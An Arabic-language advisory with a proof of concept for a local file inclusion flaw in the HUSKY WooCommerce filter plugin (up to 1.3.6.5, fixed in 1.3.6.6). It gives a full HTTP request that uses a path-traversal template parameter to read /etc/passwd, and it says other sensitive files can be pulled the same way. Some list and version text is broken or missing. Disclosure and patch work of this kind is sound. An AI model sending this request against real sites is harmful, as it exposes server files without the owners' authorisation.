
المكوّن الإضافي لـ WordPress المُسمّى HUSKY – فلتر المنتجات الاحترافي لـ WooCommerce عرضة لثغرة تضمين الملفات المحلية (LFI)
إضافة HUSKY – Products Filter Professional for WooCommerce لنظام ووردبريس معرضة لثغرة تضمين الملفات المحلي (Local File Inclusion - LFI) في جميع الإصدارات حتى 1.3.6.5 وما دون، عبر معامل template الخاص بإجراء AJAX woof_text_search.
يسمح هذا للمهاجمين غير المصادق عليهم بتضمين وتنفيذ ملفات عشوائية على الخادم، مما قد يؤدي إلى:
<= 1.3.6.51.3.6.6قم بتحديث الإصدار إلى 1.3.6.6 أو أي إصدار مُصحَّح أحدث.
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
action=woof_text_search&
4. في حال نجاح العملية، سيعيد الخادم محتويات ملف /etc/passwd.
5. يمكن استخدام ذلك لاستخراج ملفات حساسة أخرى من الخادم.
إثبات المفهوم هذا مخصص للأغراض التعليمية والبحثية فقط. الاختبار غير المصرح به ضد الأنظمة دون إذن يعتبر غير قانوني وغير أخلاقي. احرص دائمًا على الحصول على تفويض صريح قبل إجراء أي اختبار أمني.